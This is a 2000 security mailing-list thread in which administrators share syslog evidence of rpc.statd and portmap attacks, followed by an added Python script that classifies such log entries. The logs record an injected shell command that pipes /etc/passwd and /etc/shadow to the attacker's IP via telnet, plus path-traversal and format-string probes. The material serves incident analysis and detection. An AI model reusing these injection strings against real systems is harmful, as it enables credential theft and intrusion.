Security Incidents mailing list archives
Re: funky syslog entry
From: BPontz () E-DIALOG COM (Brian Pontz)
Date: Thu, 29 Jun 2000 14:21:50 -0400
Since rpc attacks have come up I thought I'd share this attack that happened to me last year. The hacker ended up crashing the server.

Brian

Oct 5 01:36:09 vs1 sshd[5125]: connect from c992426-f.pinol1.sfba.home.com
Oct 5 01:36:15 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user.
Oct 5 01:36:49 vs1 rpc.statd: Invalid hostname to sm_mon: /../../../tmp/Max.rpc.statd.vulnerability
Oct 5 01:36:51 vs1 portmap[5130]: connect from 24.5.193.149 to set(1002): request from non-local host
Oct 5 01:36:51 vs1 portmap[5131]: connect from 24.5.193.149 to callit(portmapper): request not forwarded
Oct 5 01:36:53 vs1 rpc.statd: Invalid hostname to sm_mon: ^?^?^?^?
Oct 5 01:36:54 vs1 portmap[5132]: connect from 24.5.193.149 to callit(portmapper): request not forwarded
Oct 5 01:36:54 vs1 rpc.statd: unmon request from anti-slavery for unknown host ^?^?^?^?
Oct 5 01:36:55 vs1 rpc.statd: Invalid hostname to sm_mon: -c "sleep 2;sleep 15|/bin/cat /etc/passwd /etc/shadow - |/bin/telnet 24.5.193.149 1593 >/dev/null"
Oct 5 01:36:55 vs1 rpc.statd: unmon request from anti-slavery for unknown host -c "sleep 2;sleep 15|/bin/cat /etc/passwd /etc/shadow - |/bin/telnet 24.5.193.149 1593 >/dev/null"
Oct 5 01:36:57 vs1 portmap[5133]: connect from 24.5.193.149 to callit(mountd): request not forwarded
Oct 5 01:36:57 vs1 portmap[5134]: connect from 24.5.193.149 to callit(portmapper): request not forwarded
Oct 5 01:37:00 vs1 portmap[5135]: connect from 24.5.193.149 to callit(mountd): request not forwarded
Oct 5 01:37:01 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user.
Oct 5 01:37:03 vs1 portmap[5136]: connect from 24.5.193.149 to callit(mountd): request not forwarded
Oct 5 01:37:06 vs1 portmap[5138]: connect from 24.5.193.149 to callit(mountd): request not forwarded
Oct 5 01:37:07 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user.
Oct 5 01:37:09 vs1 portmap[5140]: connect from 24.5.193.149 to callit(mountd): request not forwarded
Oct 5 01:37:12 vs1 portmap[5142]: connect from 24.5.193.149 to callit(mountd): request not forwarded
Oct 5 01:37:13 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user.
Oct 5 01:37:15 vs1 portmap[5144]: connect from 24.5.193.149 to callit(mountd): request not forwarded
Oct 5 01:37:18 vs1 portmap[5145]: connect from 24.5.193.149 to callit(mountd): request not forwarded
Oct 5 01:37:20 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user.
Oct 5 01:37:21 vs1 portmap[5146]: connect from 24.5.193.149 to callit(mountd): request not forwarded
Oct 5 01:37:24 vs1 portmap[5147]: connect from 24.5.193.149 to callit(mountd): request not forwarded
Oct 5 01:37:26 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user.
Oct 5 01:37:32 vs1 /kernel: pid 5148 (Count.cgi1.2), uid 65534: exited on signal 10
Oct 5 01:37:32 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user.
Oct 5 01:37:45 vs1 last message repeated 2 times
Oct 5 01:37:59 vs1 sshd[5152]: connect from c992426-f.pinol1.sfba.home.com
Oct 5 01:38:05 vs1 sshd[5153]: connect from c992426-f.pinol1.sfba.home.com
Oct 5 01:41:40 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "uucp" user.
Oct 5 01:42:13 vs1 last message repeated 4 times
Oct 5 01:42:37 vs1 last message repeated 3 times
Oct 5 01:45:58 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "www" user, whose shell is illegal (/nonexistent).
Oct 5 01:46:31 vs1 last message repeated 4 times
Oct 5 01:46:53 vs1 last message repeated 3 times
Oct 5 01:47:02 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "nobody" user, whose shell is illegal (/nonexistent).
Oct 5 01:47:40 vs1 last message repeated 5 times
Oct 5 01:47:55 vs1 last message repeated 2 times
Oct 5 02:09:31 vs1 rpc.statd: Invalid hostname to sm_mon: cybercop
Oct 5 02:09:32 vs1 rpc.statd: unmon request from localhost for unknown host cybercop
Oct 5 02:09:33 vs1 rpc.statd: Invalid hostname to sm_mon: %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
Oct 5 02:09:33 vs1 rpc.statd: unmon request from %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
Oct 5 02:42:04 vs1 sshd[5524]: connect from c992426-d.pinol1.sfba.home.com
Oct 5 02:53:41 vs1 /kernel: pid 5565, uid 65534: exited on signal

-----Original Message-----
From: klug [mailto:klug () KLUG CX]
Sent: Monday, June 26, 2000 5:44 PM
To: INCIDENTS () SECURITYFOCUS COM
Subject: funky syslog entry

While searching through syslog entries I found this little tidbit. Others and I believe it's some sort of scan. Any ideas are welcome. Portmap has since been removed from this server.

klug

Jun 24 14:39:10 * portmap[27279]: connect from 193.40.245.45 to dump(): request from unauthorized host
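An added example, not part of either post in this thread: a small Python triage script that parses syslog lines of the shape shown above, labels what each rejected rpc.statd "hostname" actually contains (traversal path, control bytes, shell string, format-string run, or a plain name such as "cybercop"), and attributes the portmap and NcFTPd entries to their source address. The sample lines are constructed from the excerpts in the thread with the payloads shortened; rpc.statd logs no peer address, so its entries stay unattributed.

```python
import re
# Constructed sample, re-typed from the excerpts in this thread (payloads shortened).
SAMPLE_LOG = """\
Oct 5 01:36:15 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as "root" user.
Oct 5 01:36:49 vs1 rpc.statd: Invalid hostname to sm_mon: /../../../tmp/Max.rpc.statd.vulnerability
Oct 5 01:36:51 vs1 portmap[5130]: connect from 24.5.193.149 to set(1002): request from non-local host
Oct 5 01:36:53 vs1 rpc.statd: Invalid hostname to sm_mon: ^?^?^?^?
Oct 5 01:36:55 vs1 rpc.statd: Invalid hostname to sm_mon: -c "sleep 2;sleep 15|/bin/cat /etc/passwd"
Oct 5 02:09:31 vs1 rpc.statd: Invalid hostname to sm_mon: cybercop
Oct 5 02:09:33 vs1 rpc.statd: Invalid hostname to sm_mon: %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Oct 5 02:42:04 vs1 sshd[5524]: connect from c992426-d.pinol1.sfba.home.com
Jun 24 14:39:10 * portmap[27279]: connect from 193.40.245.45 to dump(): request from unauthorized host
"""

SYSLOG_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
                       r"(?P<prog>[^:\[\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")
SM_MON_RE = re.compile(r"Invalid hostname to sm_mon: ?(?P<name>.*)$")
PORTMAP_RE = re.compile(r"connect from (?P<src>\S+) to (?P<call>\w+\([^)]*\)): (?P<why>request .*)$")
FTP_RE = re.compile(r'Someone from (?P<src>\S+) tried to login as "(?P<user>[^"]+)" user')

def classify_statd_name(name):
    """Say what an rpc.statd 'hostname' really looks like; a genuine monitor request carries only a hostname."""
    if ".." in name or name.startswith("/"):
        return "path-traversal"          # the /../../tmp/... probe in the post
    if name.count("%") >= 4:
        return "format-string"           # the long %%%% run in the post
    if re.search(r'[|;`$]|/bin/|^-c\b', name):
        return "shell-command"           # the -c "..." string in the post
    if re.search(r"\^[?@A-Z\[\]\\^_]|[^\x20-\x7e]", name):
        return "non-printable"           # ^?^?^?^? is how syslog renders control bytes
    if re.fullmatch(r"[A-Za-z0-9.-]+", name):
        return "plain-name"              # well-formed name statd still rejected, e.g. "cybercop"
    return "other"

def find_rpc_probes(text):
    """Return (timestamp, kind, source-or-None) for every line worth an analyst's attention."""
    findings = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        ts, prog, msg = m["ts"], m["prog"], m["msg"]
        if prog == "rpc.statd" and (s := SM_MON_RE.search(msg)):
            findings.append((ts, "statd:" + classify_statd_name(s["name"]), None))  # no peer logged
        elif prog == "portmap" and (p := PORTMAP_RE.search(msg)):
            findings.append((ts, "portmap:" + p["call"], p["src"]))
        elif prog == "NcFTPd" and (f := FTP_RE.search(msg)):
            findings.append((ts, "ftp-login:" + f["user"], f["src"]))
    return findings
```

Lines that match no rule (the sshd connects here) are deliberately dropped, so the output is the short list of entries to look at rather than the whole log.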